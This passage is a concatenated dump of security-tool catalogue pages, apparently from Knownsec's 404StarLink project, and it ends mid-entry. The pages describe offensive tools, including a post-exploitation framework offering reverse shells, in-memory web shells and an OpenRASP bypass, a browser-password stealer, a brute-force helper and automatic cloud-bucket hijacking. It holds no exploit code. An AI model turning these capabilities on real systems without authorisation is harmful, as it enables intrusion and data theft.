/column/Images_2024KCon/pillager.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2024KCon/pillager.png -------------------------------------------------------------------------------- /column/starlink_project_video.md: -------------------------------------------------------------------------------- 1 | ## 星际奇兵 2 | 3 | 「星际奇兵」是知道创宇404实验室“星链计划”下的开源安全工具视频演示栏目,本栏目对项目进行细致的演示指导,陆续更新中。跟我们一起快速上手这些优秀的安全工具吧! 4 | 5 | 以下账号同步更新,欢迎关注: 6 | 7 | B站:知道创宇404实验室 8 | Weibo/微信公众号:Seebug漏洞平台 9 | 10 | **第一期演示项目:[KunLun-M](https://github.com/LoRexxar/Kunlun-M)** 11 | 自动化代码审计工具,有它一个就够了!——404星链计划KunLun-M 12 | https://www.bilibili.com/video/BV15a411G7CT 13 | 14 | **第二期演示项目:[HackBrowserData](https://github.com/moonD4rk/HackBrowserData)** 15 | 小心!这个工具可以窃取你的浏览器密码!——404星链计划HackBrowserData 16 | https://www.bilibili.com/video/BV1eU4y1z7si 17 | 18 | **第三期演示项目:[antSword](https://github.com/AntSwordProject/antSword)** 19 | 搞安全绝不能错过的跨平台网站管理工具——404星链计划antSword 20 | https://www.bilibili.com/video/BV1Jg411h7Pj 21 | 22 | **第四期演示项目:[CDK](https://github.com/cdk-team/CDK)** 23 | Github高赞工具,渗透测试er看过来——404星链计划CDK 24 | https://www.bilibili.com/video/BV1DG4y1Z784/ 25 | 26 | **第五期演示项目:[fscan](https://github.com/shadow1ng/fscan)** 27 | 【安全工具】5大功能,一键化内网扫描神器——404星链计划fscan 28 | https://www.bilibili.com/video/BV1Cv4y1R72M 29 | 30 | **第六期演示项目:[Viper](https://github.com/FunnyWolf/Viper)** 31 | 【安全工具】集成70+模块,红队内网渗透必备——404星链计划Viper 32 | https://www.bilibili.com/video/BV1zv4y1s7xv 33 | 34 | **第七期演示项目:[Pocsuite3](https://github.com/knownsec/pocsuite3)** 35 | 【安全工具】必备神器!开源远程漏洞测试框架——404星链计划Pocsuite3 36 | https://www.bilibili.com/video/BV1gz4y1E7j1 37 | 38 | **持续更新中……** -------------------------------------------------------------------------------- /detail/AiPy.md: -------------------------------------------------------------------------------- 1 | ## AiPy 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-Knownsec-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/aipyapp.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.1.28-red) 7 | ![Time](https://img.shields.io/badge/Join-20250415-green) 8 | 9 | 10 | # Python use 11 | AIPy 是 Python-use 概念的一个具体实现,旨在展示该理念的实际价值与应用潜力。 12 | 13 | 使命: 释放大语言模型的全部潜能 14 | 愿景: 能够自主改进和使用 AIPy 的更聪明的LLM 15 | 16 | ## What 17 | Python use 是把整个 Python 执行环境提供给 LLM 使用,可以想象为 LLM 坐在电脑前用键盘在 Python 命令行解释器里输入各种命令,按回车运行,然后观察执行结果,再输入代码和执行。 18 | 19 | 和 Agent 的区别是 Python use 不定义任何 tools 接口,LLM 可以自由使用 Python 运行环境提供的所有功能。 20 | 21 | ## Why 22 | 假如你是一个数据工程师,你对下面的场景一定不陌生: 23 | - 处理各种不同格式的数据文件:csv/excel,json,html, sqlite, parquet ... 24 | - 对数据进行清洗,转换,计算,聚合,排序,分组,过滤,分析,可视化等操作 25 | 26 | 这个过程经常需要: 27 | - 启动 Python,import pandas as pd,输入一堆命令处理数据 28 | - 生成一堆中间临时文件 29 | - 找 ChatGPT / Claude 描述你的需要,手工拷贝生成的数据处理代码运行。 30 | 31 | 所以,为什么不启动 Python 命令行解释器后,直接描述你的数据处理需求,然后自动完成?好处是: 32 | - 无需手工临时输入一堆 Python 命令 33 | - 无需去找 GPT 描述需求,拷贝程序,然后手工运行 34 | 35 | 这就是 Python use 要解决的问题! 36 | 37 | ## How 38 | Python use (aipython) 是一个集成 LLM 的 Python 命令行解释器。你可以: 39 | - 像往常一样输入和执行 Python 命令 40 | - 用自然语言描述你的需求,aipython 会自动生成 Python 命令,然后执行 41 | 42 | 而且,两种模式可以互相访问数据。例如,aipython 处理完你的自然语言命令后,你可以用标准 Python 命令查看各种数据。 43 | 44 | ## Interfaces 45 | ### ai 对象 46 | - \_\_call\_\_(instruction): 执行自动处理循环,直到 LLM 不再返回代码消息 47 | - save(path): 保存交互过程到 svg 或 html 文件 48 | - llm 属性: LLM 对象 49 | - runner 属性: Runner 对象 50 | 51 | ### LLM 对象 52 | - history 属性: 用户和LLL交互过程的消息历史 53 | 54 | ### Runner 对象 55 | - globals: 执行 LLM 返回代码的 Python 环境全局变量 56 | - locals: 执行 LLM 返回代码的 Python 环境局部变量 57 | 58 | ### runtime 对象 59 | 供 LLM 生成的代码调用,提供以下接口: 60 | - install_packages(packages): 申请安装第三方包 61 | - getenv(name, desc=None): 获取环境变量 62 | - display(path=None, url=None): 在终端显示图片 63 | 64 | ## Usage 65 | AIPython 有两种运行模式: 66 | - 任务模式:非常简单易用,直接输入你的任务即可,适合不熟悉 Python 的用户。 67 | - Python模式:适合熟悉 Python 的用户,既可以输入任务也可以输入 Python 命令,适合高级用户。 68 | 69 | 默认运行模式是任务模式,可以通过 `--python` 参数切换到 Python 模式。 70 | 71 | ### 任务模式 72 | `uv run aipython` 73 | 74 | ``` 75 | >>> 获取Reddit r/LocalLLaMA 最新帖子 76 | ...... 77 | ...... 78 | >>> /done 79 | ``` 80 | 81 | `pip install aipyapp` ,运行aipy命令进入任务模式 82 | 83 | ``` 84 | -> % aipy 85 | 🚀 Python use - AIPython (0.1.22) [https://aipy.app] 86 | 请输入需要 AI 处理的任务 (输入 /use <下述 LLM> 切换) 87 | >> 获取Reddit r/LocalLLaMA 最新帖子 88 | ...... 89 | >> 90 | ``` 91 | 92 | ### Python 模式 93 | #### 基本用法 94 | 自动任务处理: 95 | 96 | ``` 97 | >>> ai("获取Google官网首页标题") 98 | ``` 99 | 100 | #### 自动申请安装第三方库 101 | ``` 102 | Python use - AIPython (Quit with 'exit()') 103 | >>> ai("使用psutil列出当前MacOS所有进程列表") 104 | 105 | 📦 LLM 申请安装第三方包: ['psutil'] 106 | 如果同意且已安装,请输入 'y [y/n] (n): y 107 | 108 | ``` 109 | 110 | ## Thanks 111 | - 黑哥: 产品经理/资深用户/首席测试官 112 | - Sonnet 3.7: 生成了第一版的代码,几乎无需修改就能使用。 113 | - ChatGPT: 提供了很多建议和代码片段,特别是命令行接口。 114 | - Codeium: 代码智能补齐 115 | - Copilot: 代码改进建议和翻译 README 116 | 117 | 118 | ## 项目相关 119 | 120 | 121 | ## 最近更新 122 | 123 | #### [v0.1.28] - 2025-05-21 124 | 125 | **新增** 126 | - Trustoken集成联网搜索功能,新闻、时事查询更快捷,平均用时大幅降低。 127 | - 任务执行完毕自动上传云端私密存储功能,方便用户案例管理或分享精彩案例给他人,该功能可通过配置关闭。 128 | - Trustoken新增阿里Qwen、腾讯Hunyuan最新模型,多重选择更智能。 129 | - GUI客户端可通过“aipyw”命令在终端直接打开。 130 | - GUI客户端可通过“aipyw”命令在终端直接打开。 131 | **优化** 132 | - 新用户首次使用引导流程优化,操作体验更便捷。 133 | - 大幅改善任务拆解、执行逻辑、内置最佳实践方案,执行复杂任务将用时更短、实现方案更可靠。 134 | - 任务中Python库安装调整为无需确认方式,任务执行过程全自动完成。 135 | - 修正多处缺陷。 136 | 137 | #### [v0.1.27] - 2025-04-30 138 | 139 | **问题修复** 140 | - 修复界面显示问题 141 | - 修复代码重构导致的Bug 142 | 143 | #### [v0.1.25] - 2025-04-24 144 | 145 | **更新** 146 | - 增加了 GUI 图形界面 147 | - 修复产品Bug 148 | - 提供 Windows 一键运行包 149 | 150 | #### [v0.1.24] - 2025-04-20 151 | 152 | **更新** 153 | - 完善 plugin 接口 154 | - 修改任务记录保存方式 155 | - 更新系统提示词 156 | 157 | 158 | -------------------------------------------------------------------------------- /detail/Antenna.md: -------------------------------------------------------------------------------- 1 | ## Antenna 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-wuba-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/wuba/Antenna.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.3.5-red) 7 | ![Time](https://img.shields.io/badge/Join-20220914-green) 8 | 9 | 10 | Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验证网络中多种漏洞是否存在以及可利用性的工具。其基于带外应用安全测试( 11 | OAST)通过任务的形式,将不同漏洞场景检测能力通过插件的形式进行集合,通过与目标进行Out-of-bind的数据通信方式进行辅助检测。 12 | 13 | ## Antenna的目标 14 | 15 | 我们绝不仅仅只是将Antenna做成一款只能监听DNS、HTTP等协议来简单判断无回显类型漏洞的工具,我们的目标是尝试在良好使用体验的基础上支持高度灵活的自定义组件能力,满足用户通过Antenna探索并实现各种应用安全漏洞场景的辅助检测。尽可能得实现通过Antenna这款产品降低各种安全漏洞场景的检测成本。 16 | 17 | ## 相关网站 18 | 19 | 博客(已开放):[Antenna 博客](http://blog.antenna.cool/docs/intro) 20 | 21 | 演示平台(暂时关闭):[演示平台](http://jiemuzu.cn) 22 | 23 | 漏洞靶场(已支持docker部署,docker-compose文件在项目docker目录中) 24 | :[lcttty/antenna-range:0.0.1](https://github.com/wuba/Antenna/blob/main/docker/docker-compose-range.yaml) 25 | 26 | ## Antenna_Inside计划 27 | 28 | 在我们开发Antenna时,就希望能够支持现有市场上流行的漏洞扫描工具漏洞结果回调与主动查询 29 | ,所以我们推出了CallBack与OpenAPI。为了让我们的这两个模块能够更加灵活与优雅。我们决定发起 30 | Antenna_Inside计划,如果您是使用扫描工具的用户或者作者请联系我们,我们会无条件支持您的项目与 31 | 需求,帮助Antenna更方便的与漏洞扫描流程打通。如果您有推荐打通的项目,也可以在issue中提出来 32 | 33 | 已加入Antenna_Inside项目 34 | 35 | | 项目名称 | 项目地址 | 36 | |------------|----------------------------------------------------------------------------| 37 | | EasyPen | [https://github.com/lijiejie/EasyPen](https://github.com/lijiejie/EasyPen) | 38 | 39 | ## 近期使用疑问解答 40 | 41 | #### 1、源码部署服务未启动,或者启动了DNS不好使 42 | 43 | 回答: 该项目暂不推荐使用python3.7版本以下环境部署,请认真查看安装部署教程-源码部署部分, 44 | 检查配置中项目路径与实际项目路径相同,启动后也可以尝试使用`supervisorctl status` 45 | 查看各个组件运行状态 46 | 47 | #### 2、关于各类组件的使用说明以及能否再详细的进行说明自定义组件开发教程 48 | 49 | 回答:文章将在Antenna博客不定时更新,基础文章已有,后续详细的也会有的,作者在加班加点的写,绝不会让各位师傅等太久 50 | 51 | #### 3、运行docker-compose命令后镜像构建时间过长 52 | 53 | 1. 可尝试修改Dockerfile中制定相关下载源地址内容 54 | 2. 可修改docker-compose文件中镜像,官方镜像已打包至dockerhub https://hub.docker.com/r/jihongjun/antenna/tags 55 | 可尝试使用`docker pull jihongjun/antenna` 进行拉取 56 | 57 | #### 4、其他问题 58 | 如果您遇到了其他问题可查阅项目issue进行寻找相关解决方案,如果发现并没有其他人遇到和您相关的问题,请新建issue, 59 | 作者会及时回答您的疑问 60 | 61 | ## 相关教程链接 62 | 63 | ## 最新公告 64 | 65 | DNS_REBINDING 功能演示:[Antenna v1.3.0 版本更新公告(含DNS REBINDING使用教程)](http://blog.antenna.cool/blog/V1.3.0%20update) 66 | 67 | ### 关于部署 68 | 69 | 基础部署教程:[安装部署](http://blog.antenna.cool/docs/intro) 70 | 71 | 隐匿部署教程:[关于Antenna的隐匿性部署](http://blog.antenna.cool/blog/%20%20Secrecy) 72 | 73 | 前后端分离部署 [Antenna的前后端分离部署](http://blog.antenna.cool/blog/client_server) 74 | 75 | ### 关于配置 76 | 77 | 基础配置教程:[基础配置教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E9%85%8D%E7%BD%AE/config) 78 | 79 | 域名配置及DNS相关配置:[域名配置及阿里云dns服务修改教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E9%85%8D%E7%BD%AE/DNS) 80 | 81 | 开通邮箱通知以及邮箱授权码申请教程:[QQ邮箱授权码申请教程](https://service.mail.qq.com/cgi-bin/help?subtype=1&id=28&no=1001256) 82 | 83 | ### 关于任务 84 | 85 | 任务基础使用教程:[如何简单的使用任务](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E4%BB%BB%E5%8A%A1/task) 86 | 87 | ### 关于组件 88 | 89 | 组件基础使用教程:[Antenna的灵魂-组件Template](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/template) 90 | 91 | xss 组件使用教程:[xss组件使用教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/xss) 92 | 93 | 组件开发教程:[如何编写Antenna组件](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/template_demo) 94 | 95 | 自定义HTTP组件使用教程[自定义HTTP组件使用教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/custom_http) 96 | 97 | ### 关于OPEN_API与CallBack 98 | 99 | OPEN_API与CallBack使用教程:[关于OPEN_API与CallBack](http://blog.antenna.cool/docs/api_back) 100 | 101 | 102 | ## 项目相关 103 | 104 | 105 | ## 最近更新 106 | 107 | #### [v1.3.5] - 2023-04-21 108 | 109 | **更新** 110 | - 修复HTTPS分块传输请求导致处理逻辑错误 111 | - 废弃domain_in查询方式,后续多个域名查询可使用多个domain参数查询 112 | - 新增api查询用户token以及查询当前项目使用版本接口 113 | 114 | #### [v1.3.4] - 2023-04-06 115 | 116 | **更新** 117 | - 增加OPENAPI 消息ORDER_DESC 参数 118 | - 优化了工具方法逻辑,修复了一些已知的问题 119 | - 为Python SDK 做接口适配开发 120 | 121 | #### [v1.3.2] - 2023-03-01 122 | 123 | **更新** 124 | - 优化了任务模块功能逻辑 125 | - 修复python3.6版本不支持socket解析ip的bug 126 | 127 | #### [v1.3.1] - 2023-02-26 128 | 129 | **更新** 130 | - Readme 新增DNS Rebinding功能演示文档,支持并优化了DNS 缓存的逻辑 131 | - 优化了平台消息处理模块的逻辑,减少了数据库的请求数量 132 | - 修复了平台配置的一些bug 133 | 134 | #### [v1.2.1] - 2022-10-19 135 | 136 | **更新** 137 | - 优化HTTP/HTTPS请求处理模块,消息结果展示数据请求报文 138 | - 修复组件模块bug,添加组件代码展示&编辑功能 139 | - OPEN_API新增domain_contains、content_contains查询关键字 140 | - 优化用户使用体验、更新配置无需再重启docker及系统 141 | - 日常修复了一些bug 142 | 143 | 144 | -------------------------------------------------------------------------------- /detail/AppScan.md: -------------------------------------------------------------------------------- 1 | ## AppScan 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-TongchengOpenSource-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/TongchengOpenSource/AppScan.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V2.1.5-red) 7 | ![Time](https://img.shields.io/badge/Join-20231025-green) 8 | 9 | 10 |

11 | AppScan 12 |

13 | 14 | --- 15 | 16 |

安全隐私卫士(AppScan)一款免费的企业级自动化隐私检测工具。

17 | 18 | ## 背景 19 |   随着移动互联网的高速发展, 各公司对保护用户的个人隐私安 20 | 全意识也在愈发重视. 但是在实际业务场景中受限于代码开发 21 | 质量或因产品设计不谨慎等原因, APP 难免会引入一些违规收集 22 | 的合规问题, 因此各公司也在加大人力进行合规风险检测, 不过 23 | 随着业务不断发展、功能的频繁迭代更新, 导致人工检测成本 24 | 突增并且很多功能无法检测覆盖, 基于以上背景, 我们开发了 25 | AppScan 这款隐私合规检测工具, 它是一款基于动态分析, 可以 26 | 精准定位 APP 的违规风险点的自动化隐私检测工具, 能够大大 27 | 提高了合规检测的效率, 帮助使用者便捷、高效、全面的完成 28 | 合规检测, 保障业务合规运行. 29 | 30 |   AppScan作为一款免费工具,可以帮助大家便捷、高效、全面的完成合规检测,但是由于AppScan还是一个刚孵化的产品,在自动化等方面还没有很完善,我们希望可以吸取大家在使用过程中发现的问题以及优化的建议,帮助AppScan一起成长。 31 | 32 | ## AppScan优点 33 | + 全面性:  从信息收集、权限申请及数据传输等多个维度,实现对APP个人信息合规的全面检测。 34 | + 规范性:  全面覆盖《App违法违规收集使用个人信息行为认定方法》、国家标准GB/T35273《信息安全技术 个人信息安全规范》、《中华人民共和国网络安全法》等主流安全检测标准。 35 | + 高效性:  可帮助APP开发公司及开发者快速对APP进行日常合规检测,深度挖掘隐私合规风险点、快速处理大批量App,替代人工翻查代码,降低时间与人力成本,显著提升检测效率。 36 | + 易用性:  无需环境搭配、开箱即用。 37 | 38 | ## 安装指南 39 | ⬇️[下载地址](https://github.com/tongcheng-security-team/AppScan/releases) 40 | 41 | ## 支持的环境 42 | - windows: 10及以上 43 | - macOs: 11.0及以上 44 | - android: 8.x及以上 45 | - app: 64位/未加固(有时候引入的第三方sdk也会自带一些反检测功能) 46 | 47 | ## 模拟器 48 | 根据 https://github.com/TongchengOpenSource/AppScan/discussions/29 的投票结果, 我们对MuMu和雷电进行了适配工作调研 49 | 目前支持的模拟器 50 | - 雷神模拟器9(需要在 设置-其他设置 中开启root权限, 设置ADB调试为'开启本地连接') 51 | 52 | 目前暂不支持的模拟器 53 | - MuMu模拟器12(未找到ADB开关, 导致ADB无法识别到设备) 54 | 55 | ## 使用文档 56 | > 使用者查看此文档即可 57 | 58 | 🏠[使用文档](https://github.com/TongchengOpenSource/AppScan/wiki) 59 | 60 | ## 开发文档 61 | > 开发者需要额外查看文档 62 | ### 架构 63 | 👽[架构说明](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/architecture.md) 64 | 65 | ### 开发文档 66 | 👽[开发文档](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/dev.md) 67 | 68 | ### build指南 69 | 👽[build指南](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/build.md) 70 | 71 | ### api文档 72 | 👽[api文档](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/api.md) 73 | 74 | ## 系统展示 75 | * 连接展示 76 | 77 | ![!连接展示](https://github.com/TongchengOpenSource/AppScan/raw/main/doc/image/connect.png) 78 | 79 | * 结果展示 80 | 81 | ![!结果展示](https://github.com/TongchengOpenSource/AppScan/raw/main/doc/image/dashboard.png) 82 | 83 | 84 | ## 项目相关 85 | 86 | 87 | ## 最近更新 88 | 89 | #### [v2.1.5] - 2024-05-26 90 | 91 | **新功能** 92 | - 修复AndroidID误报 93 | - SDK名单新增quickGame匹配 94 | 95 | **优化** 96 | - 丰富安卓ID触发场景 97 | - 丰富获取安装app信息触发场景 98 | 99 | **修复** 100 | - 打标信息缺失 101 | 102 | #### [v2.1.2] - 2023-11-25 103 | 104 | **新功能** 105 | - 支持雷电模拟器9 106 | - 更新frida到16.1.4 107 | - 更新adb到RC14.0.5 108 | 109 | **优化** 110 | - 迁移更新源到githubRelease 111 | - '关于我们'菜单优化 112 | - 增加错误日志记录堆栈信息 113 | 114 | **修复** 115 | - 修复打标页面描述错误与错位 116 | - 修复android13兼容问题 117 | - 修复打标文案错乱问题 118 | - 修复app信息缺失导致的panic问题 119 | 120 | 121 | -------------------------------------------------------------------------------- /detail/As-Exploits.md: -------------------------------------------------------------------------------- 1 | ## As-Exploits 2 | 3 | ![Language](https://img.shields.io/badge/Language-JavaScript-blue) 4 | ![Author](https://img.shields.io/badge/Author-yzddmr6-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/yzddmr6/As-Exploits.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.5.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20210422-green) 8 | 9 | 10 | 11 | 中国蚁剑后渗透框架 12 | 13 | 详细介绍: 14 | 15 | 支持类型:php/jsp/aspx 16 | 17 | Payload部分很多借鉴了[冰蝎](https://github.com/rebeyond/Behinder)跟[哥斯拉](https://github.com/BeichenDream/Godzilla)的实现,向其开发者们表示感谢! 18 | 19 | ## 支持列表 20 | 21 | | 模块名称\Shell类型 | PHP | ASPX | JSP | 22 | | :---------------: | :--: | :--: | :--: | 23 | | 基本信息 | √ | √ | √ | 24 | | 反弹Shell | √ | √ | √ | 25 | | 内存马 | | √ | √ | 26 | | 内存马管理 | | √ | √ | 27 | | 杀软识别 | √ | √ | √ | 28 | | 提权辅助 | √ | √ | √ | 29 | | 屏幕截图 | | √ | √ | 30 | | ShellCode加载器 | | √ | √ | 31 | | Jar加载器 | | | √ | 32 | | Bypass OpenRASP | | | √ | 33 | 34 | ## 模块介绍 35 | 36 | [As-Exploits Wiki](https://github.com/yzddmr6/As-Exploits/wiki#模块介绍) 37 | 38 | 39 | ## 项目相关 40 | 41 | - 2021-11-18 发布文章[《As-Exploits:中国蚁剑后渗透框架》](https://mp.weixin.qq.com/s/ofeoMTqaJgZcc37JQVYoeg) 42 | 43 | ## 最近更新 44 | 45 | #### [v1.5.0] - 2023-10-21 46 | 47 | **更新** 48 | - 新增支持jspjs/aspxcsharp类型 49 | - 除内存马/内存马管理模块以外,均支持Tomcat10 50 | - 内存马注入模块更新:新增Filter部分类型,新增WebSocket部分类型,取消支持Servlet内存马 51 | - 内存马管理模块新增Listener、Tomcat-Value、等等内存马的查杀检测 52 | - Jar加载器模块内存加载功能BUG修复 53 | - ShellCode加载-JNA模块更新,提高兼容性跟稳定性 54 | - execPayload模块支持新增额外参数 55 | - 新增Js引擎执行模块 56 | - aspxcsharp类型支持回显自定义分隔符 57 | - aspxcsharp新增SharpLoader模块 58 | 59 | 60 | -------------------------------------------------------------------------------- /detail/BurpCrypto.md: -------------------------------------------------------------------------------- 1 | ## BurpCrypto 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-whwlsfb-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/whwlsfb/BurpCrypto.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20211122-green) 8 | 9 | 10 | Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). 11 | 12 | # Build 13 | `$ mvn package` 14 | # Usage 15 | [中文使用说明](https://blog.wanghw.cn/burpcrypto) 16 | 17 | - Download the precompiled jar package from [Releases](https://github.com/whwlsfb/BurpCrypto/releases). 18 | - Add this jar package to your burpsuite's Extensions. 19 | - Switch to BurpCrypto tab, select you need Cipher tab. 20 | - Set key or some value. 21 | - press "Add processor", and give a name for this processor. 22 | - Switch to Intruder->Payloads->Payload Processing. 23 | - press "Add", select "Invoke Burp extension", and select processor you just created. 24 | - press "Start attack", have fun! 25 | 26 | ## Key Example 27 | 28 | - Aes Key(UTF8String): abcdefgabcdefg12 29 | - Aes IV(UTF8String): abcdefgabcdefg12 30 | - Rsa X509 Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC0hrRIjb3noDWNtbDpANbjt5Iwu2NFeDwU16Ec87ToqeoIm2KI+cOs81JP9aTDk/jkAlU97mN8wZkEMDr5utAZtMVht7GLX33Wx9XjqxUsDfsGkqNL8dXJklWDu9Zh80Ui2Ug+340d5dZtKtd+nv09QZqGjdnSp9PTfFDBY133QIDAQAB 31 | - Rsa Modulus: ca27d90f03753cbbc9958011baf701ac99305b63f68e26ab5617593e01d2fb519127fb87bafbe6e0472ec3a038575fa292adadbc79390a955a61b29431f78f4734773048a45dcf100e23cabf2df11a55aa90cd6b024a44eed1096c3b9e1408d46aae54d7291b82fe4b7867c5eaa45e9cc0ba7f7ae3e5593337c7dcbace2d02ed2fbbff26c6df8a32bb26be80603fcd94c6c8dbd67878d77b37fedcf808e3d8f469aaa7c65d033d547a5c8ea9bdd5c89b836c65852f355a5efd9c7137a186a62b5eb0e052c8be3096d3b51133f8a8c108292a296c99d37bad42bcc3f6c39fa5e583582942b4fc4e7ff4b6779fff5bbaddc65b19c7c57d8cdb39b1a994e08d4a2f50793d8f707d069c380baf0f64bfdce3b35d0b5c5c59348a35a082012aaf4991080abf518b55787969ff24186cb95f7e7218c904cf1dcaeb5bed723e305b83f2e85d6f116d2c7400f9e49d904db8a5a3a0701cdb579fbf3128511acd0f789ece1233ed926d705b3b0dfa34bf33f5ae4bdc611a602aa03aaae13400bc7ad3813ea4474dc62de3d0cb1f5aac277d895a75d38f9b920938fa6b1de35bd6132798c122403c685bdb6e5e24bbd70cfb3e968da0b8affd398e539e7c1e7add09891780bcbd278f3900499ae09cee0dc62e3f92e70001bab6d46261d2801a37f80d84d0e39fce6eaedf106a61b5961960641b9db0e4e23c770e6370ac5d61c6c9eb0f07 32 | - Rsa Exponent: 010001 33 | - DES Key: 12345678 34 | - DESede Key: 123456781234567812345678 35 | 36 | 37 | ## Screenshots 38 | 39 | AES Example: 40 | 41 | ![](https://github.com/whwlsfb/BurpCrypto/raw/master/screenshot/aes.gif) 42 | 43 | ExecJs Example (Here is the modified MD5 algorithm): 44 | 45 | ![](https://github.com/whwlsfb/BurpCrypto/raw/master/screenshot/execjs.gif) 46 | 47 | Quick Crypto: 48 | 49 | ![](https://github.com/whwlsfb/BurpCrypto/raw/master/screenshot/quick_crypto.gif) 50 | 51 | 52 | 53 | ## 项目相关 54 | 55 | - 2021-11-25 发布文章[《BurpCrypto : 万能网站密码爆破测试工具》](https://mp.weixin.qq.com/s/-paMF8IepVUue7HyVHiLmw) 56 | 57 | ## 最近更新 58 | 59 | 60 | -------------------------------------------------------------------------------- /detail/Cloud-Bucket-Leak-Detection-Tools.md: -------------------------------------------------------------------------------- 1 | ## Cloud-Bucket-Leak-Detection-Tools 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-UzJu-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.4.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20220829-green) 8 | 9 | 10 | 11 | ```bash 12 | git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git 13 | cd Cloud-Bucket-Leak-Detection-Tools/ 14 | # 安装依赖 建议使用Python3.8以上的版本 我的版本: Python 3.9.13 (main, May 24 2022, 21:28:31) 15 | # 已经测试版本如下 16 | # 1、python3.8.9 17 | # 2、python3.9.13 18 | # 3、python3.7 19 | # 4、python3.6.15 20 | # 5、python3.9.6 21 | pip3 install -r requirements.txt 22 | python3 main.py -h 23 | ``` 24 | 25 | ![image-20220716140707903](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716140707903.png) 26 | 27 | 使用之前需要在`config/conf.py`文件配置自己对应的云厂商AK 28 | 29 | ![image-20220716140934866](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716140934866.png) 30 | 31 | ## 1、阿里云存储桶 32 | 33 | ### 1.1、单个存储桶检测 34 | 35 | ```bash 36 | python3 main.py -aliyun [存储桶URL] 37 | ``` 38 | 39 | ![image-20220716141132931](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141132931.png) 40 | 41 | ### 1.2、自动存储桶劫持 42 | 43 | 当如果检测存储桶不存在时会自动劫持该存储桶 44 | 45 | ![image-20220703202339058](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220703202339058.png) 46 | 47 | ### 1.3、批量存储桶地址检测 48 | 49 | ```bash 50 | # fofa语法 51 | domain="aliyuncs.com" 52 | server="AliyunOSS"domain="aliyuncs.com" 53 | ``` 54 | 55 | ```bash 56 | # 使用-faliyun 57 | python3 main.py -faliyun url.txt 58 | ``` 59 | 60 | ![image-20220716141356518](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141356518.png) 61 | 62 | ## 2、腾讯云存储桶 63 | 64 | ```bash 65 | python3 main.py -tcloud [存储桶地址] 66 | ``` 67 | 68 | ![image-20220716141554856](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141554856.png) 69 | 70 | ## 3、华为云存储桶 71 | 72 | ```bash 73 | python3 main.py -hcloud [存储桶地址] 74 | ``` 75 | 76 | ![image-20220716141948046](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141948046.png) 77 | 78 | ## 4、AWS存储桶 79 | 80 | ```bash 81 | python3 main.py -aws [存储桶地址] 82 | ``` 83 | 84 | ![image-20220716142431142](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142431142.png) 85 | 86 | ## 5、扫描结果保存 87 | 88 | 扫描结果会存放在`results`目录下 89 | 90 | ![image-20220716142617997](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142617997.png) 91 | 92 | ![image-20220716142641883](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142641883.png) 93 | 94 | 95 | 96 | ## 项目相关 97 | 98 | 99 | ## 最近更新 100 | 101 | 102 | -------------------------------------------------------------------------------- /detail/CodeReviewTools.md: -------------------------------------------------------------------------------- 1 | ## CodeReviewTools 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-Ppsoft1991-orange) 5 | ![GitHub 